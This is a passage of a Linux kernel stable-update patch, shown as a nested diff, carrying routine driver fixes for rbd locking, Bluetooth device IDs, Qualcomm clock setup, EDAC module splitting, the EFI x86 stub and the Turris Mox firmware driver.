+ EXPORT_SYMBOL_GPL(devm_free_percpu);
+diff --git a/drivers/block/rbd.c b/drivers/block/rbd.c
+index f58ca9ce35031..4f8efc829a59f 100644
+--- a/drivers/block/rbd.c
++++ b/drivers/block/rbd.c
+@@ -362,7 +362,7 @@ enum rbd_watch_state {
+ enum rbd_lock_state {
+ 	RBD_LOCK_STATE_UNLOCKED,
+ 	RBD_LOCK_STATE_LOCKED,
+-	RBD_LOCK_STATE_RELEASING,
++	RBD_LOCK_STATE_QUIESCING,
+ };
+ 
+ /* WatchNotify::ClientId */
+@@ -422,7 +422,7 @@ struct rbd_device {
+ 	struct list_head	running_list;
+ 	struct completion	acquire_wait;
+ 	int			acquire_err;
+-	struct completion	releasing_wait;
++	struct completion	quiescing_wait;
+ 
+ 	spinlock_t		object_map_lock;
+ 	u8			*object_map;
+@@ -525,7 +525,7 @@ static bool __rbd_is_lock_owner(struct rbd_device *rbd_dev)
+ 	lockdep_assert_held(&rbd_dev->lock_rwsem);
+ 
+ 	return rbd_dev->lock_state == RBD_LOCK_STATE_LOCKED ||
+-	       rbd_dev->lock_state == RBD_LOCK_STATE_RELEASING;
++	       rbd_dev->lock_state == RBD_LOCK_STATE_QUIESCING;
+ }
+ 
+ static bool rbd_is_lock_owner(struct rbd_device *rbd_dev)
+@@ -3458,13 +3458,14 @@ static void rbd_lock_del_request(struct rbd_img_request *img_req)
+ 	lockdep_assert_held(&rbd_dev->lock_rwsem);
+ 	spin_lock(&rbd_dev->lock_lists_lock);
+ 	if (!list_empty(&img_req->lock_item)) {
++		rbd_assert(!list_empty(&rbd_dev->running_list));
+ 		list_del_init(&img_req->lock_item);
+-		need_wakeup = (rbd_dev->lock_state == RBD_LOCK_STATE_RELEASING &&
++		need_wakeup = (rbd_dev->lock_state == RBD_LOCK_STATE_QUIESCING &&
+ 			       list_empty(&rbd_dev->running_list));
+ 	}
+ 	spin_unlock(&rbd_dev->lock_lists_lock);
+ 	if (need_wakeup)
+-		complete(&rbd_dev->releasing_wait);
++		complete(&rbd_dev->quiescing_wait);
+ }
+ 
+ static int rbd_img_exclusive_lock(struct rbd_img_request *img_req)
+@@ -3477,11 +3478,6 @@ static int rbd_img_exclusive_lock(struct rbd_img_request *img_req)
+ 	if (rbd_lock_add_request(img_req))
+ 		return 1;
+ 
+-	if (rbd_dev->opts->exclusive) {
+-		WARN_ON(1); /* lock got released? */
+-		return -EROFS;
+-	}
+-
+ 	/*
+ 	 * Note the use of mod_delayed_work() in rbd_acquire_lock()
+ 	 * and cancel_delayed_work() in wake_lock_waiters().
+@@ -4182,16 +4178,16 @@ static bool rbd_quiesce_lock(struct rbd_device *rbd_dev)
+ 	/*
+ 	 * Ensure that all in-flight IO is flushed.
+ 	 */
+-	rbd_dev->lock_state = RBD_LOCK_STATE_RELEASING;
+-	rbd_assert(!completion_done(&rbd_dev->releasing_wait));
++	rbd_dev->lock_state = RBD_LOCK_STATE_QUIESCING;
++	rbd_assert(!completion_done(&rbd_dev->quiescing_wait));
+ 	if (list_empty(&rbd_dev->running_list))
+ 		return true;
+ 
+ 	up_write(&rbd_dev->lock_rwsem);
+-	wait_for_completion(&rbd_dev->releasing_wait);
++	wait_for_completion(&rbd_dev->quiescing_wait);
+ 
+ 	down_write(&rbd_dev->lock_rwsem);
+-	if (rbd_dev->lock_state != RBD_LOCK_STATE_RELEASING)
++	if (rbd_dev->lock_state != RBD_LOCK_STATE_QUIESCING)
+ 		return false;
+ 
+ 	rbd_assert(list_empty(&rbd_dev->running_list));
+@@ -4602,6 +4598,10 @@ static void rbd_reacquire_lock(struct rbd_device *rbd_dev)
+ 			rbd_warn(rbd_dev, "failed to update lock cookie: %d",
+ 				 ret);
+ 
++		if (rbd_dev->opts->exclusive)
++			rbd_warn(rbd_dev,
++			     "temporarily releasing lock on exclusive mapping");
++
+ 		/*
+ 		 * Lock cookie cannot be updated on older OSDs, so do
+ 		 * a manual release and queue an acquire.
+@@ -5383,7 +5383,7 @@ static struct rbd_device *__rbd_dev_create(struct rbd_spec *spec)
+ 	INIT_LIST_HEAD(&rbd_dev->acquiring_list);
+ 	INIT_LIST_HEAD(&rbd_dev->running_list);
+ 	init_completion(&rbd_dev->acquire_wait);
+-	init_completion(&rbd_dev->releasing_wait);
++	init_completion(&rbd_dev->quiescing_wait);
+ 
+ 	spin_lock_init(&rbd_dev->object_map_lock);
+ 
+@@ -6589,11 +6589,6 @@ static int rbd_add_acquire_lock(struct rbd_device *rbd_dev)
+ 	if (ret)
+ 		return ret;
+ 
+-	/*
+-	 * The lock may have been released by now, unless automatic lock
+-	 * transitions are disabled.
+-	 */
+-	rbd_assert(!rbd_dev->opts->exclusive || rbd_is_lock_owner(rbd_dev));
+ 	return 0;
+ }
+ 
+diff --git a/drivers/bluetooth/btusb.c b/drivers/bluetooth/btusb.c
+index 6a772b955d69d..2d8c405a27a6c 100644
+--- a/drivers/bluetooth/btusb.c
++++ b/drivers/bluetooth/btusb.c
+@@ -545,6 +545,10 @@ static const struct usb_device_id blacklist_table[] = {
+ 						     BTUSB_WIDEBAND_SPEECH },
+ 	{ USB_DEVICE(0x13d3, 0x3571), .driver_info = BTUSB_REALTEK |
+ 						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x13d3, 0x3591), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
++	{ USB_DEVICE(0x0489, 0xe125), .driver_info = BTUSB_REALTEK |
++						     BTUSB_WIDEBAND_SPEECH },
+ 
+ 	/* Realtek Bluetooth devices */
+ 	{ USB_VENDOR_AND_INTERFACE_INFO(0x0bda, 0xe0, 0x01, 0x01),
+diff --git a/drivers/char/hw_random/amd-rng.c b/drivers/char/hw_random/amd-rng.c
+index 0555e3838bce1..5229da114377a 100644
+--- a/drivers/char/hw_random/amd-rng.c
++++ b/drivers/char/hw_random/amd-rng.c
+@@ -142,8 +142,10 @@ static int __init amd_rng_mod_init(void)
+ 
+ found:
+ 	err = pci_read_config_dword(pdev, 0x58, &pmbase);
+-	if (err)
++	if (err) {
++		err = pcibios_err_to_errno(err);
+ 		goto put_dev;
++	}
+ 
+ 	pmbase &= 0x0000FF00;
+ 	if (pmbase == 0) {
+diff --git a/drivers/char/tpm/eventlog/common.c b/drivers/char/tpm/eventlog/common.c
+index 8512ec76d5260..4a6186f9f8899 100644
+--- a/drivers/char/tpm/eventlog/common.c
++++ b/drivers/char/tpm/eventlog/common.c
+@@ -47,6 +47,8 @@ static int tpm_bios_measurements_open(struct inode *inode,
+ 	if (!err) {
+ 		seq = file->private_data;
+ 		seq->private = chip;
++	} else {
++		put_device(&chip->dev);
+ 	}
+ 
+ 	return err;
+diff --git a/drivers/clk/clk-en7523.c b/drivers/clk/clk-en7523.c
+index 29f0126cbd05b..d22fae24a3dab 100644
+--- a/drivers/clk/clk-en7523.c
++++ b/drivers/clk/clk-en7523.c
+@@ -41,6 +41,7 @@ struct en_clk_desc {
+ 	u8 div_shift;
+ 	u16 div_val0;
+ 	u8 div_step;
++	u8 div_offset;
+ };
+ 
+ struct en_clk_gate {
+@@ -68,6 +69,7 @@ static const struct en_clk_desc en7523_base_clks[] = {
+ 		.div_bits = 3,
+ 		.div_shift = 0,
+ 		.div_step = 1,
++		.div_offset = 1,
+ 	}, {
+ 		.id = EN7523_CLK_EMI,
+ 		.name = "emi",
+@@ -81,6 +83,7 @@ static const struct en_clk_desc en7523_base_clks[] = {
+ 		.div_bits = 3,
+ 		.div_shift = 0,
+ 		.div_step = 1,
++		.div_offset = 1,
+ 	}, {
+ 		.id = EN7523_CLK_BUS,
+ 		.name = "bus",
+@@ -94,6 +97,7 @@ static const struct en_clk_desc en7523_base_clks[] = {
+ 		.div_bits = 3,
+ 		.div_shift = 0,
+ 		.div_step = 1,
++		.div_offset = 1,
+ 	}, {
+ 		.id = EN7523_CLK_SLIC,
+ 		.name = "slic",
+@@ -134,13 +138,14 @@ static const struct en_clk_desc en7523_base_clks[] = {
+ 		.div_bits = 3,
+ 		.div_shift = 0,
+ 		.div_step = 1,
++		.div_offset = 1,
+ 	}, {
+ 		.id = EN7523_CLK_CRYPTO,
+ 		.name = "crypto",
+ 
+ 		.base_reg = REG_CRYPTO_CLKSRC,
+ 		.base_bits = 1,
+-		.base_shift = 8,
++		.base_shift = 0,
+ 		.base_values = emi_base,
+ 		.n_base_values = ARRAY_SIZE(emi_base),
+ 	}
+@@ -185,7 +190,7 @@ static u32 en7523_get_div(void __iomem *base, int i)
+ 	if (!val && desc->div_val0)
+ 		return desc->div_val0;
+ 
+-	return (val + 1) * desc->div_step;
++	return (val + desc->div_offset) * desc->div_step;
+ }
+ 
+ static int en7523_pci_is_enabled(struct clk_hw *hw)
+diff --git a/drivers/clk/davinci/da8xx-cfgchip.c b/drivers/clk/davinci/da8xx-cfgchip.c
+index 4103d605e804f..6faa4372ed65a 100644
+--- a/drivers/clk/davinci/da8xx-cfgchip.c
++++ b/drivers/clk/davinci/da8xx-cfgchip.c
+@@ -505,7 +505,7 @@ da8xx_cfgchip_register_usb0_clk48(struct device *dev,
+ 	const char * const parent_names[] = { "usb_refclkin", "pll0_auxclk" };
+ 	struct clk *fck_clk;
+ 	struct da8xx_usb0_clk48 *usb0;
+-	struct clk_init_data init;
++	struct clk_init_data init = {};
+ 	int ret;
+ 
+ 	fck_clk = devm_clk_get(dev, "fck");
+@@ -579,7 +579,7 @@ da8xx_cfgchip_register_usb1_clk48(struct device *dev,
+ {
+ 	const char * const parent_names[] = { "usb0_clk48", "usb_refclkin" };
+ 	struct da8xx_usb1_clk48 *usb1;
+-	struct clk_init_data init;
++	struct clk_init_data init = {};
+ 	int ret;
+ 
+ 	usb1 = devm_kzalloc(dev, sizeof(*usb1), GFP_KERNEL);
+diff --git a/drivers/clk/qcom/camcc-sc7280.c b/drivers/clk/qcom/camcc-sc7280.c
+index ec163ea769f59..932096a972bc3 100644
+--- a/drivers/clk/qcom/camcc-sc7280.c
++++ b/drivers/clk/qcom/camcc-sc7280.c
+@@ -2260,6 +2260,7 @@ static struct gdsc cam_cc_bps_gdsc = {
+ 		.name = "cam_cc_bps_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = HW_CTRL | RETAIN_FF_ENABLE,
+ };
+ 
+@@ -2269,6 +2270,7 @@ static struct gdsc cam_cc_ife_0_gdsc = {
+ 		.name = "cam_cc_ife_0_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+@@ -2278,6 +2280,7 @@ static struct gdsc cam_cc_ife_1_gdsc = {
+ 		.name = "cam_cc_ife_1_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+@@ -2287,6 +2290,7 @@ static struct gdsc cam_cc_ife_2_gdsc = {
+ 		.name = "cam_cc_ife_2_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = RETAIN_FF_ENABLE,
+ };
+ 
+@@ -2296,6 +2300,7 @@ static struct gdsc cam_cc_ipe_0_gdsc = {
+ 		.name = "cam_cc_ipe_0_gdsc",
+ 	},
+ 	.pwrsts = PWRSTS_OFF_ON,
++	.parent = &cam_cc_titan_top_gdsc.pd,
+ 	.flags = HW_CTRL | RETAIN_FF_ENABLE,
+ };
+ 
+diff --git a/drivers/clk/qcom/clk-branch.h b/drivers/clk/qcom/clk-branch.h
+index 17a58119165e8..55b3a2c3afed9 100644
+--- a/drivers/clk/qcom/clk-branch.h
++++ b/drivers/clk/qcom/clk-branch.h
+@@ -37,6 +37,32 @@ struct clk_branch {
+ 	struct clk_regmap clkr;
+ };
+ 
++/* Branch clock common bits for HLOS-owned clocks */
++#define CBCR_FORCE_MEM_CORE_ON		BIT(14)
++#define CBCR_FORCE_MEM_PERIPH_ON	BIT(13)
++#define CBCR_FORCE_MEM_PERIPH_OFF	BIT(12)
++
++static inline void qcom_branch_set_force_mem_core(struct regmap *regmap,
++						  struct clk_branch clk, bool on)
++{
++	regmap_update_bits(regmap, clk.halt_reg, CBCR_FORCE_MEM_CORE_ON,
++			   on ? CBCR_FORCE_MEM_CORE_ON : 0);
++}
++
++static inline void qcom_branch_set_force_periph_on(struct regmap *regmap,
++						   struct clk_branch clk, bool on)
++{
++	regmap_update_bits(regmap, clk.halt_reg, CBCR_FORCE_MEM_PERIPH_ON,
++			   on ? CBCR_FORCE_MEM_PERIPH_ON : 0);
++}
++
++static inline void qcom_branch_set_force_periph_off(struct regmap *regmap,
++						    struct clk_branch clk, bool on)
++{
++	regmap_update_bits(regmap, clk.halt_reg, CBCR_FORCE_MEM_PERIPH_OFF,
++			   on ? CBCR_FORCE_MEM_PERIPH_OFF : 0);
++}
++
+ extern const struct clk_ops clk_branch_ops;
+ extern const struct clk_ops clk_branch2_ops;
+ extern const struct clk_ops clk_branch_simple_ops;
+diff --git a/drivers/clk/qcom/clk-rcg2.c b/drivers/clk/qcom/clk-rcg2.c
+index dc797bd137caf..e46bb60dcda41 100644
+--- a/drivers/clk/qcom/clk-rcg2.c
++++ b/drivers/clk/qcom/clk-rcg2.c
+@@ -1136,7 +1136,39 @@ clk_rcg2_shared_recalc_rate(struct clk_hw *hw, unsigned long parent_rate)
+ 	return clk_rcg2_recalc_rate(hw, parent_rate);
+ }
+ 
++static int clk_rcg2_shared_init(struct clk_hw *hw)
++{
++	/*
++	 * This does a few things:
++	 *
++	 *  1. Sets rcg->parked_cfg to reflect the value at probe so that the
++	 *     proper parent is reported from clk_rcg2_shared_get_parent().
++	 *
++	 *  2. Clears the force enable bit of the RCG because we rely on child
++	 *     clks (branches) to turn the RCG on/off with a hardware feedback
++	 *     mechanism and only set the force enable bit in the RCG when we
++	 *     want to make sure the clk stays on for parent switches or
++	 *     parking.
++	 *
++	 *  3. Parks shared RCGs on the safe source at registration because we
++	 *     can't be certain that the parent clk will stay on during boot,
++	 *     especially if the parent is shared. If this RCG is enabled at
++	 *     boot, and the parent is turned off, the RCG will get stuck on. A
++	 *     GDSC can wedge if it is turned on and the RCG is stuck on because
++	 *     the GDSC's controller will hang waiting for the clk status to
++	 *     toggle on when it never does.
++	 *
++	 * The safest option here is to "park" the RCG at init so that the clk
++	 * can never get stuck on or off. This ensures the GDSC can't get
++	 * wedged.
++	 */
++	clk_rcg2_shared_disable(hw);
++
++	return 0;
++}
++
+ const struct clk_ops clk_rcg2_shared_ops = {
++	.init = clk_rcg2_shared_init,
+ 	.enable = clk_rcg2_shared_enable,
+ 	.disable = clk_rcg2_shared_disable,
+ 	.get_parent = clk_rcg2_shared_get_parent,
+diff --git a/drivers/clk/qcom/gcc-sc7280.c b/drivers/clk/qcom/gcc-sc7280.c
+index 46d41ebce2b08..2067e39840cb4 100644
+--- a/drivers/clk/qcom/gcc-sc7280.c
++++ b/drivers/clk/qcom/gcc-sc7280.c
+@@ -3469,6 +3469,9 @@ static int gcc_sc7280_probe(struct platform_device *pdev)
+ 	regmap_update_bits(regmap, 0x71004, BIT(0), BIT(0));
+ 	regmap_update_bits(regmap, 0x7100C, BIT(13), BIT(13));
+ 
++	/* FORCE_MEM_CORE_ON for ufs phy ice core clocks */
++	qcom_branch_set_force_mem_core(regmap, gcc_ufs_phy_ice_core_clk, true);
++
+ 	ret = qcom_cc_register_rcg_dfs(regmap, gcc_dfs_clocks,
+ 			ARRAY_SIZE(gcc_dfs_clocks));
+ 	if (ret)
+diff --git a/drivers/clk/qcom/gpucc-sm8350.c b/drivers/clk/qcom/gpucc-sm8350.c
+index 5367ce654ac9a..cc9fcbc884650 100644
+--- a/drivers/clk/qcom/gpucc-sm8350.c
++++ b/drivers/clk/qcom/gpucc-sm8350.c
+@@ -2,6 +2,7 @@
+ /*
+  * Copyright (c) 2019-2020, The Linux Foundation. All rights reserved.
+  * Copyright (c) 2022, Linaro Limited
++ * Copyright (c) 2024, Qualcomm Innovation Center, Inc. All rights reserved.
+  */
+ 
+ #include <linux/clk.h>
+@@ -147,7 +148,7 @@ static struct clk_rcg2 gpu_cc_gmu_clk_src = {
+ 		.parent_data = gpu_cc_parent_data_0,
+ 		.num_parents = ARRAY_SIZE(gpu_cc_parent_data_0),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+@@ -169,7 +170,7 @@ static struct clk_rcg2 gpu_cc_hub_clk_src = {
+ 		.parent_data = gpu_cc_parent_data_1,
+ 		.num_parents = ARRAY_SIZE(gpu_cc_parent_data_1),
+ 		.flags = CLK_SET_RATE_PARENT,
+-		.ops = &clk_rcg2_ops,
++		.ops = &clk_rcg2_shared_ops,
+ 	},
+ };
+ 
+diff --git a/drivers/cpufreq/ti-cpufreq.c b/drivers/cpufreq/ti-cpufreq.c
+index 61ef653bcf56f..15e2ef8303508 100644
+--- a/drivers/cpufreq/ti-cpufreq.c
++++ b/drivers/cpufreq/ti-cpufreq.c
+@@ -381,7 +381,7 @@ static int ti_cpufreq_probe(struct platform_device *pdev)
+ 
+ 	ret = dev_pm_opp_set_config(opp_data->cpu_dev, &config);
+ 	if (ret < 0) {
+-		dev_err(opp_data->cpu_dev, "Failed to set OPP config\n");
++		dev_err_probe(opp_data->cpu_dev, ret, "Failed to set OPP config\n");
+ 		goto fail_put_node;
+ 	}
+ 
+diff --git a/drivers/crypto/qat/qat_common/adf_cfg.c b/drivers/crypto/qat/qat_common/adf_cfg.c
+index 1931e5b37f2bd..368d14d81503c 100644
+--- a/drivers/crypto/qat/qat_common/adf_cfg.c
++++ b/drivers/crypto/qat/qat_common/adf_cfg.c
+@@ -276,17 +276,19 @@ int adf_cfg_add_key_value_param(struct adf_accel_dev *accel_dev,
+ 	 * 3. if the key exists with the same value, then return without doing
+ 	 *    anything (the newly created key_val is freed).
+ 	 */
++	down_write(&cfg->lock);
+ 	if (!adf_cfg_key_val_get(accel_dev, section_name, key, temp_val)) {
+ 		if (strncmp(temp_val, key_val->val, sizeof(temp_val))) {
+ 			adf_cfg_keyval_remove(key, section);
+ 		} else {
+ 			kfree(key_val);
+-			return 0;
++			goto out;
+ 		}
+ 	}
+ 
+-	down_write(&cfg->lock);
+ 	adf_cfg_keyval_add(key_val, section);
++
++out:
+ 	up_write(&cfg->lock);
+ 	return 0;
+ }
+diff --git a/drivers/dma/ti/k3-udma.c b/drivers/dma/ti/k3-udma.c
+index 82e7acfda6ed0..e323e1a5f20f3 100644
+--- a/drivers/dma/ti/k3-udma.c
++++ b/drivers/dma/ti/k3-udma.c
+@@ -4423,7 +4423,9 @@ static int udma_get_mmrs(struct platform_device *pdev, struct udma_dev *ud)
+ 		ud->rchan_cnt = UDMA_CAP2_RCHAN_CNT(cap2);
+ 		break;
+ 	case DMA_TYPE_BCDMA:
+-		ud->bchan_cnt = BCDMA_CAP2_BCHAN_CNT(cap2);
++		ud->bchan_cnt = BCDMA_CAP2_BCHAN_CNT(cap2) +
++				BCDMA_CAP3_HBCHAN_CNT(cap3) +
++				BCDMA_CAP3_UBCHAN_CNT(cap3);
+ 		ud->tchan_cnt = BCDMA_CAP2_TCHAN_CNT(cap2);
+ 		ud->rchan_cnt = BCDMA_CAP2_RCHAN_CNT(cap2);
+ 		ud->rflow_cnt = ud->rchan_cnt;
+diff --git a/drivers/edac/Makefile b/drivers/edac/Makefile
+index 2d1641a27a28f..a98e1981df157 100644
+--- a/drivers/edac/Makefile
++++ b/drivers/edac/Makefile
+@@ -54,11 +54,13 @@ obj-$(CONFIG_EDAC_MPC85XX)		+= mpc85xx_edac_mod.o
+ layerscape_edac_mod-y			:= fsl_ddr_edac.o layerscape_edac.o
+ obj-$(CONFIG_EDAC_LAYERSCAPE)		+= layerscape_edac_mod.o
+ 
+-skx_edac-y				:= skx_common.o skx_base.o
+-obj-$(CONFIG_EDAC_SKX)			+= skx_edac.o
++skx_edac_common-y			:= skx_common.o
+ 
+-i10nm_edac-y				:= skx_common.o i10nm_base.o
+-obj-$(CONFIG_EDAC_I10NM)		+= i10nm_edac.o
++skx_edac-y				:= skx_base.o
++obj-$(CONFIG_EDAC_SKX)			+= skx_edac.o skx_edac_common.o
++
++i10nm_edac-y				:= i10nm_base.o
++obj-$(CONFIG_EDAC_I10NM)		+= i10nm_edac.o skx_edac_common.o
+ 
+ obj-$(CONFIG_EDAC_CELL)			+= cell_edac.o
+ obj-$(CONFIG_EDAC_PPC4XX)		+= ppc4xx_edac.o
+diff --git a/drivers/edac/skx_common.c b/drivers/edac/skx_common.c
+index f0f8e98f6efb2..e218909f9f9e8 100644
+--- a/drivers/edac/skx_common.c
++++ b/drivers/edac/skx_common.c
+@@ -48,7 +48,7 @@ static u64 skx_tolm, skx_tohm;
+ static LIST_HEAD(dev_edac_list);
+ static bool skx_mem_cfg_2lm;
+ 
+-int __init skx_adxl_get(void)
++int skx_adxl_get(void)
+ {
+ 	const char * const *names;
+ 	int i, j;
+@@ -110,12 +110,14 @@ int __init skx_adxl_get(void)
+ 
+ 	return -ENODEV;
+ }
++EXPORT_SYMBOL_GPL(skx_adxl_get);
+ 
+-void __exit skx_adxl_put(void)
++void skx_adxl_put(void)
+ {
+ 	kfree(adxl_values);
+ 	kfree(adxl_msg);
+ }
++EXPORT_SYMBOL_GPL(skx_adxl_put);
+ 
+ static bool skx_adxl_decode(struct decoded_addr *res, bool error_in_1st_level_mem)
+ {
+@@ -187,12 +189,14 @@ void skx_set_mem_cfg(bool mem_cfg_2lm)
+ {
+ 	skx_mem_cfg_2lm = mem_cfg_2lm;
+ }
++EXPORT_SYMBOL_GPL(skx_set_mem_cfg);
+ 
+ void skx_set_decode(skx_decode_f decode, skx_show_retry_log_f show_retry_log)
+ {
+ 	driver_decode = decode;
+ 	skx_show_retry_rd_err_log = show_retry_log;
+ }
++EXPORT_SYMBOL_GPL(skx_set_decode);
+ 
+ int skx_get_src_id(struct skx_dev *d, int off, u8 *id)
+ {
+@@ -206,6 +210,7 @@ int skx_get_src_id(struct skx_dev *d, int off, u8 *id)
+ 	*id = GET_BITFIELD(reg, 12, 14);
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(skx_get_src_id);
+ 
+ int skx_get_node_id(struct skx_dev *d, u8 *id)
+ {
+@@ -219,6 +224,7 @@ int skx_get_node_id(struct skx_dev *d, u8 *id)
+ 	*id = GET_BITFIELD(reg, 0, 2);
+ 	return 0;
+ }
++EXPORT_SYMBOL_GPL(skx_get_node_id);
+ 
+ static int get_width(u32 mtr)
+ {
+@@ -284,6 +290,7 @@ int skx_get_all_bus_mappings(struct res_config *cfg, struct list_head **list)
+ 		*list = &dev_edac_list;
+ 	return ndev;
+ }
++EXPORT_SYMBOL_GPL(skx_get_all_bus_mappings);
+ 
+ int skx_get_hi_lo(unsigned int did, int off[], u64 *tolm, u64 *tohm)
+ {
+@@ -323,6 +330,7 @@ int skx_get_hi_lo(unsigned int did, int off[], u64 *tolm, u64 *tohm)
+ 	pci_dev_put(pdev);
+ 	return -ENODEV;
+ }
++EXPORT_SYMBOL_GPL(skx_get_hi_lo);
+ 
+ static int skx_get_dimm_attr(u32 reg, int lobit, int hibit, int add,
+ 			     int minval, int maxval, const char *name)
+@@ -394,6 +402,7 @@ int skx_get_dimm_info(u32 mtr, u32 mcmtr, u32 amap, struct dimm_info *dimm,
+ 
+ 	return 1;
+ }
++EXPORT_SYMBOL_GPL(skx_get_dimm_info);
+ 
+ int skx_get_nvdimm_info(struct dimm_info *dimm, struct skx_imc *imc,
+ 			int chan, int dimmno, const char *mod_str)
+@@ -442,6 +451,7 @@ int skx_get_nvdimm_info(struct dimm_info *dimm, struct skx_imc *imc,
+ 
+ 	return (size == 0 || size == ~0ull) ? 0 : 1;
+ }
++EXPORT_SYMBOL_GPL(skx_get_nvdimm_info);
+ 
+ int skx_register_mci(struct skx_imc *imc, struct pci_dev *pdev,
+ 		     const char *ctl_name, const char *mod_str,
+@@ -512,6 +522,7 @@ int skx_register_mci(struct skx_imc *imc, struct pci_dev *pdev,
+ 	imc->mci = NULL;
+ 	return rc;
+ }
++EXPORT_SYMBOL_GPL(skx_register_mci);
+ 
+ static void skx_unregister_mci(struct skx_imc *imc)
+ {
+@@ -694,6 +705,7 @@ int skx_mce_check_error(struct notifier_block *nb, unsigned long val,
+ 	mce->kflags |= MCE_HANDLED_EDAC;
+ 	return NOTIFY_DONE;
+ }
++EXPORT_SYMBOL_GPL(skx_mce_check_error);
+ 
+ void skx_remove(void)
+ {
+@@ -731,3 +743,8 @@ void skx_remove(void)
+ 		kfree(d);
+ 	}
+ }
++EXPORT_SYMBOL_GPL(skx_remove);
++
++MODULE_LICENSE("GPL v2");
++MODULE_AUTHOR("Tony Luck");
++MODULE_DESCRIPTION("MC Driver for Intel server processors");
+diff --git a/drivers/edac/skx_common.h b/drivers/edac/skx_common.h
+index 0cbadd3d2cd39..c0c174c101d2c 100644
+--- a/drivers/edac/skx_common.h
++++ b/drivers/edac/skx_common.h
+@@ -178,8 +178,8 @@ typedef int (*get_dimm_config_f)(struct mem_ctl_info *mci,
+ typedef bool (*skx_decode_f)(struct decoded_addr *res);
+ typedef void (*skx_show_retry_log_f)(struct decoded_addr *res, char *msg, int len, bool scrub_err);
+ 
+-int __init skx_adxl_get(void);
+-void __exit skx_adxl_put(void);
++int skx_adxl_get(void);
++void skx_adxl_put(void);
+ void skx_set_decode(skx_decode_f decode, skx_show_retry_log_f show_retry_log);
+ void skx_set_mem_cfg(bool mem_cfg_2lm);
+ 
+diff --git a/drivers/firmware/efi/libstub/x86-stub.c b/drivers/firmware/efi/libstub/x86-stub.c
+index f7eb389aeec06..b8246fc7f4122 100644
+--- a/drivers/firmware/efi/libstub/x86-stub.c
++++ b/drivers/firmware/efi/libstub/x86-stub.c
+@@ -435,11 +435,12 @@ void __noreturn efi_stub_entry(efi_handle_t handle,
+ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 				   efi_system_table_t *sys_table_arg)
+ {
+-	static struct boot_params boot_params __page_aligned_bss;
+-	struct setup_header *hdr = &boot_params.hdr;
+ 	efi_guid_t proto = LOADED_IMAGE_PROTOCOL_GUID;
++	struct boot_params *boot_params;
++	struct setup_header *hdr;
+ 	int options_size = 0;
+ 	efi_status_t status;
++	unsigned long alloc;
+ 	char *cmdline_ptr;
+ 
+ 	if (efi_is_native())
+@@ -457,6 +458,13 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 		efi_exit(handle, status);
+ 	}
+ 
++	status = efi_allocate_pages(PARAM_SIZE, &alloc, ULONG_MAX);
++	if (status != EFI_SUCCESS)
++		efi_exit(handle, status);
++
++	boot_params = memset((void *)alloc, 0x0, PARAM_SIZE);
++	hdr	    = &boot_params->hdr;
++
+ 	/* Assign the setup_header fields that the kernel actually cares about */
+ 	hdr->root_flags	= 1;
+ 	hdr->vid_mode	= 0xffff;
+@@ -466,17 +474,16 @@ efi_status_t __efiapi efi_pe_entry(efi_handle_t handle,
+ 
+ 	/* Convert unicode cmdline to ascii */
+ 	cmdline_ptr = efi_convert_cmdline(image, &options_size);
+-	if (!cmdline_ptr)
+-		goto fail;
++	if (!cmdline_ptr) {
++		efi_free(PARAM_SIZE, alloc);
++		efi_exit(handle, EFI_OUT_OF_RESOURCES);
++	}
+ 
+ 	efi_set_u64_split((unsigned long)cmdline_ptr, &hdr->cmd_line_ptr,
+-			  &boot_params.ext_cmd_line_ptr);
++			  &boot_params->ext_cmd_line_ptr);
+ 
+-	efi_stub_entry(handle, sys_table_arg, &boot_params);
++	efi_stub_entry(handle, sys_table_arg, boot_params);
+ 	/* not reached */
+-
+-fail:
+-	efi_exit(handle, status);
+ }
+ 
+ static void add_e820ext(struct boot_params *params,
+diff --git a/drivers/firmware/turris-mox-rwtm.c b/drivers/firmware/turris-mox-rwtm.c
+index c2d34dc8ba462..c3d49fcc53305 100644
+--- a/drivers/firmware/turris-mox-rwtm.c
++++ b/drivers/firmware/turris-mox-rwtm.c
+@@ -2,7 +2,7 @@
+ /*
+  * Turris Mox rWTM firmware driver
+  *
+- * Copyright (C) 2019 Marek Behún <kabel@kernel.org>
++ * Copyright (C) 2019, 2024 Marek Behún <kabel@kernel.org>
+  */
+ 
+ #include <linux/armada-37xx-rwtm-mailbox.h>
+@@ -174,6 +174,9 @@ static void mox_rwtm_rx_callback(struct mbox_client *cl, void *data)
+ 	struct mox_rwtm *rwtm = dev_get_drvdata(cl->dev);
+ 	struct armada_37xx_rwtm_rx_msg *msg = data;
+ 
++	if (completion_done(&rwtm->cmd_done))
++		return;
++
+ 	rwtm->reply = *msg;
+ 	complete(&rwtm->cmd_done);
+ }
+@@ -199,9 +202,8 @@ static int mox_get_board_info(struct mox_rwtm *rwtm)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2);
+-	if (ret < 0)
+-		return ret;
++	if (!wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2))
++		return -ETIMEDOUT;
+ 
+ 	ret = mox_get_status(MBOX_CMD_BOARD_INFO, reply->retval);
+ 	if (ret == -ENODATA) {
+@@ -235,9 +237,8 @@ static int mox_get_board_info(struct mox_rwtm *rwtm)
+ 	if (ret < 0)
+ 		return ret;
+ 
+-	ret = wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2);
+-	if (ret < 0)
+-		return ret;
++	if (!wait_for_completion_timeout(&rwtm->cmd_done, HZ / 2))
